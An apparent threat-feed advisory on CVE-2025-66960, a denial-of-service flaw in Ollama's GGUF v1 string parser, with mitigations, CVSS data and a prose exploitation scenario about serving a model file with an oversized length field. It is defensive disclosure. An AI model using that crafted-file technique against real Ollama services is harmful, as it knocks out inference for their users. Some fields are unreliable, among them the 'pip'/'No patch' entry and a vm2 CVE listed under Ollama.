CVE-2025-66960: ollama: Input Validation flaw enables exploitation
HIGH PoC AVAILABLE CISA: TRACK*Ollama's GGUF v1 parser reads attacker-controlled string lengths without validation, letting any network-reachable adversary crash your inference service by serving a malicious model file — no credentials or prior access needed. If your team runs Ollama in production, CI/CD pipelines, or dev environments that pull external models, patch immediately and restrict model sources to verified registries. Treat all externally-sourced GGUF files as untrusted until upgraded.
Risk Assessment
High risk for organizations with Ollama in their AI stack. CVSS 7.5 with no authentication, no user interaction, and low complexity means exploitation requires minimal skill. Impact is availability-only (no data exposure), but inference service crashes disrupt all downstream AI-dependent applications. Highest exposure for teams with Ollama API (port 11434) network-accessible or automated model pull pipelines.
Affected Systems
| Package | Ecosystem | Vulnerable Range | Patched |
|---|---|---|---|
| ollama | pip | — | No patch |
Do you use ollama? You're affected.
Severity & Risk
Attack Surface
Recommended Action
6 steps-
Patch: Upgrade Ollama to the fixed version — check GitHub releases for CVE-2025-66960 resolution.
-
Network isolation: Restrict Ollama API access (default port 11434) to trusted internal IPs via firewall rules; never expose publicly.
-
Model provenance: Only pull models from verified, hash-validated sources — block untrusted community GGUF files via allowlist policy.
-
Process supervision: Run Ollama under systemd or supervisord with auto-restart to limit DoS downtime impact.
-
Detection: Alert on unexpected Ollama process exits or OOM kills in system and application logs.
-
Inventory: Audit all Ollama deployments across dev, staging, and prod — shadow IT instances are the highest risk.
CISA SSVC Assessment
Source: CISA Vulnrichment (SSVC v2.0). Decision based on the CISA Coordinator decision tree.
Classification
Compliance Impact
This CVE is relevant to:
Frequently Asked Questions
What is CVE-2025-66960?
Ollama's GGUF v1 parser reads attacker-controlled string lengths without validation, letting any network-reachable adversary crash your inference service by serving a malicious model file — no credentials or prior access needed. If your team runs Ollama in production, CI/CD pipelines, or dev environments that pull external models, patch immediately and restrict model sources to verified registries. Treat all externally-sourced GGUF files as untrusted until upgraded.
Is CVE-2025-66960 actively exploited?
Proof-of-concept exploit code is publicly available for CVE-2025-66960, increasing the risk of exploitation.
How to fix CVE-2025-66960?
1. Patch: Upgrade Ollama to the fixed version — check GitHub releases for CVE-2025-66960 resolution. 2. Network isolation: Restrict Ollama API access (default port 11434) to trusted internal IPs via firewall rules; never expose publicly. 3. Model provenance: Only pull models from verified, hash-validated sources — block untrusted community GGUF files via allowlist policy. 4. Process supervision: Run Ollama under systemd or supervisord with auto-restart to limit DoS downtime impact. 5. Detection: Alert on unexpected Ollama process exits or OOM kills in system and application logs. 6. Inventory: Audit all Ollama deployments across dev, staging, and prod — shadow IT instances are the highest risk.
What systems are affected by CVE-2025-66960?
This vulnerability affects the following AI/ML architecture patterns: model serving, local LLM inference, self-hosted LLM deployments, MLOps pipelines, AI development environments.
What is the CVSS score for CVE-2025-66960?
CVE-2025-66960 has a CVSS v3.1 base score of 7.5 (HIGH). The EPSS exploitation probability is 0.29%.
Technical Details
NVD Description
An issue in ollama v.0.12.10 allows a remote attacker to cause a denial of service via the fs/ggml/gguf.go, function readGGUFV1String reads a string length from untrusted GGUF metadata
Exploitation Scenario
An adversary crafts a GGUF v1 model file with a maliciously oversized string length value in the metadata header (e.g., 0xFFFFFFFF bytes). They publish it to a public model hub or host it on an attacker-controlled server. When an engineer runs 'ollama pull attacker/malicious-model' or an automated MLOps pipeline fetches and evaluates new models from external sources, Ollama's readGGUFV1String in fs/ggml/gguf.go reads the attacker-controlled length and attempts to allocate or read that many bytes, triggering a Go panic. The Ollama service crashes immediately, dropping all active inference sessions. In environments with fully automated model evaluation pipelines, this attack can be triggered repeatedly without any human interaction.
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H References
- github.com/ollama/ollama/issues/9820 Exploit Issue Vendor
- zero.shotlearni.ng/blog/cve-2025-66960guf-v1-string-length-cause-panic-in-readggufv1string/ Exploit 3rd Party
Timeline
Related Vulnerabilities
CVE-2025-63389 9.8 ollama: Missing Auth allows unauthenticated access
Same package: ollama CVE-2026-44007 9.1 vm2: sandbox escape via nesting:true enables RCE
Same package: ollama CVE-2024-37032 8.8 Ollama: path traversal enables RCE via model blob API
Same package: ollama CVE-2024-39720 8.2 Ollama: OOB read in GGUF parser enables remote DoS
Same package: ollama CVE-2024-39719 7.5 Ollama: file existence oracle via api/create errors
Same package: ollama
AI Threat Alert